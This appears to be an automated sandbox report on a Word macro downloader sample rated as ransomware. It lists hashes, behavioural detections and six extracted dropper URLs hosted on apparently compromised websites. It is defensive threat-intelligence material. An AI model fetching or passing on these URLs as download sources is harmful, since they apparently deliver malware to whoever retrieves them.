Overview

overview

10

Static

static

8

SecuriteIn...65.doc

windows7_x64

10

SecuriteIn...65.doc

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    SecuriteInfo.com.W97M.DownLoader.5053.17523.965

  • Size

    83KB

  • Sample

    210120-b9pqmrwaxe

  • MD5

    8d56d1367c961e45f047bd453f1d083e

  • SHA1

    d1fd9363ab7e13dc58adddc49237da769360e801

  • SHA256

    a0ddd4c77bf541f12349e90e60de498bde50a2fa4d4234b7831f439d935753eb

  • SHA512

    3c9c8fbfcc2b9cd1a46d769dc43c6802920e30893dc72deffea168327be1e09e007e3b40617ebaeb0257f6436342c638835f51571c0723bd4741f3eb24b0379c

Score
10/10
macroransomwarexlm

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.ausutra.com/wp-admin/Logs/
exe.dropper

http://artas.biz/c/System/
exe.dropper

http://www.spmkomputer.com/kasir/diagnostics/
exe.dropper

https://sislog.es/wp-admin/MSInfo/
exe.dropper

http://institutmestres.com/wp-includes/n7Fl9WDm/
exe.dropper

http://noithatcongnghieptantien.com/wp-content/Fonts/

Targets

    • Target

      SecuriteInfo.com.W97M.DownLoader.5053.17523.965

    • Size

      83KB

    • MD5

      8d56d1367c961e45f047bd453f1d083e

    • SHA1

      d1fd9363ab7e13dc58adddc49237da769360e801

    • SHA256

      a0ddd4c77bf541f12349e90e60de498bde50a2fa4d4234b7831f439d935753eb

    • SHA512

      3c9c8fbfcc2b9cd1a46d769dc43c6802920e30893dc72deffea168327be1e09e007e3b40617ebaeb0257f6436342c638835f51571c0723bd4741f3eb24b0379c

    Score
    10/10
    ransomware

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

    • Enumerates physical storage devices

      Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

      ransomware
    behavioral1behavioral2

MITRE ATT&CK Enterprise v6

Tasks